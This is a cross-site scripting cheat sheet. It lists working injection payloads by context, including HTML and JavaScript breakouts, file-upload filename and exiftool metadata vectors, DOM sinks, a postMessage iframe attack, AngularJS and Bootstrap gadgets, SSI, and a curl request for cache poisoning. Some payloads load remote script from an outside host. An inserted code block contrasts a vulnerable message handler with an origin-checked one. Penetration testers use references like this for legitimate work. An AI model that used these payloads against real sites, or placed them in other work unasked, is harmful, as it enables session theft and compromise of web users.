XSS Cheat Sheet


  • HTML Injection
<svg onload=alert(1)>
"><svg onload=alert(1)>
  • HTML Injection - Tag Block Breakout

Use when input lands inside the following tags, or between their opening and closing tags:


</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
  • HTML Injection - Inline

Use when input lands inside the attribute value of an HTML tag, but that tag cannot be closed with a greater-than sign (>).

"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
  • HTML Injection - Source

Use when input is used as the value of one of the following HTML tag attributes: href, src, data or action (formaction included). The src attribute of a script tag can be a URL or "data:,alert(1)".

  • Javascript Injection


  • Javascript Injection - Escape Bypass


  • Javascript Injection – Script Breakout
</script><svg onload=alert(1)>


  • Javascript Injection - Logical Block


  • Javascript Injection - Quoteless

Use when there are multiple reflections in the same line of JS code.

  • Javascript Context - Placeholder Injection in Template Literals

Use when input lands inside a string delimited by backticks (`) or inside a template engine.

  • Multi Reflections HTML Injection - Double Reflection (Single Input)


  • Multi Reflections HTML Injection - Triple Reflection (Single Input)
  • Multi Input Reflections HTML Injection - Double & Triple (Multiple Inputs)
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
  • File Upload Injection – Filename


"><svg onload=alert(1)>.gif
  • File Upload Injection – Metadata

Use when metadata of an uploaded file is reflected somewhere in the target page. It uses the
command-line exiftool ("$" is the terminal prompt), and any metadata field can be set.


$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
  • File Upload Injection – SVG File


<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
  • DOM Insert Injection
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
  • DOM Insert Injection – Resource Request


data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
  • PHP Self URL Injection


https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
  • Markdown Vector

Use in text boxes, comment sections and similar places that allow some markup as input. Click to fire.


  • Script Injection - No Closing Tag

Use when there's a closing script tag (</script>) somewhere in the code after the reflection.

<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
  • Javascript postMessage() DOM Injection (with Iframe)

Use when there's a "message" event listener like "window.addEventListener('message', ...)"
in the javascript code without a check for the origin. The target must be framable (X-Frame-Options
header according to context). Save as an HTML file (or use data:text/html), providing
TARGET_URL and INJECTION (an XSS vector or payload).

<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
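The listener described above, as an added defensive example that is not part of the original cheat sheet: a "message" handler with no origin check and an HTML sink, beside a hardened handler that checks event.origin and writes the data as text. It runs under Node with a minimal stand-in for a DOM element; TRUSTED_ORIGIN and the message values are constructed assumptions.

```javascript
// Assumed: the single origin that is allowed to post messages to this page.
const TRUSTED_ORIGIN = 'https://app.example';

// Stand-in for a DOM element so the handlers can run outside a browser.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// Vulnerable pattern: any frame or opener may post, and the data is parsed as HTML.
// This is the shape of listener the cheat sheet's iframe/postMessage vector relies on.
function vulnerableHandler(target, event) {
  target.innerHTML = event.data; // markup from an unknown origin reaches the DOM
  return true; // message was processed
}

// Hardened pattern: accept only the expected origin and shape, and render as text.
function hardenedHandler(target, event) {
  if (event.origin !== TRUSTED_ORIGIN) {
    return false; // foreign origin: ignore (a log entry could be emitted here)
  }
  if (typeof event.data !== 'string') {
    return false; // unexpected payload shape: ignore
  }
  target.textContent = event.data; // text node, never parsed as markup
  return true;
}

// Constructed cross-origin message carrying one of the DOM insertion vectors above.
const crossOriginMessage = {
  origin: 'https://attacker.invalid', // constructed value, not a real site
  data: '<img src=1 onerror=alert(1)>',
};

// Constructed same-origin message that the hardened handler should still accept.
const sameOriginMessage = { origin: TRUSTED_ORIGIN, data: 'hello' };

// Runs both handlers against both messages and returns what reached each sink.
function demo() {
  const vuln = makeElement();
  const hard = makeElement();
  const ok = makeElement();
  return {
    vulnProcessed: vulnerableHandler(vuln, crossOriginMessage),
    vulnHTML: vuln.innerHTML,
    hardProcessed: hardenedHandler(hard, crossOriginMessage),
    hardText: hard.textContent,
    sameOriginProcessed: hardenedHandler(ok, sameOriginMessage),
    sameOriginText: ok.textContent,
  };
}
```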
  • XML-Based XSS

Use to inject an XSS vector in an XML page (content types text/xml or application/xml).
Prepend "-->" to the payload if input lands in a comment section, or "]]>" if input lands in a
CDATA section.

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
  • AngularJS Injections (v1.6 and up)

Use when there's an AngularJS library loaded in the page, inside an HTML block with the ng-app
directive (1st payload) or by creating your own (2nd one).

<x ng-app>{{$new.constructor('alert(1)')()}}
  • Onscroll Universal Vector

It works with the address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul,
and h1 to h6 HTML tags.

<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
  • Type Juggling

Use to pass an "if" condition matching a number in loose comparisons.

1<svg onload=alert(1)>
1"><svg onload=alert(1)>
  • XSS in SSI

Use when there's a Server-Side Include (SSI) injection.

<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
  • SQLi Error-Based XSS


'1<svg onload=alert(1)>
<svg onload=alert(1)>\
  • Injection in JSP Path

Use in JSP-based applications, in the path of the URL.

//DOMAIN/PATH/;<svg onload=alert(1)>
//DOMAIN/PATH/;"><svg onload=alert(1)>
  • JS Injection - ReferenceError Fix


Use to fix the syntax of some hanging javascript code. Check the console tab in the browser
Developer Tools (F12) for the respective ReferenceError and replace the var and function
names accordingly.

';alert(1);var myObj='
';alert(1);function myFunc(){}'
  • Bootstrap Vector (up to v3.4.0)

Use when there's a Bootstrap library present on the page. It also bypasses the WebKit Auditor; just
click anywhere in the page to trigger. Any char of the href value can be HTML encoded to bypass.

<html data-toggle=tab href="<img src=x onerror=alert(1)>">
  • Browser Notification


  • XSS in HTTP Header - Cached

Use to store an XSS vector in the application by using the MISS-MISS-HIT cache scheme (if
there's one in place). Replace <XSS> with your respective vector and TARGET with the target URL, adding a dummy
string to avoid the actually cached version of the page. Fire the same request 3 times.

$ curl -H "Vulnerable_Header: <XSS>" TARGET/?dummy_string
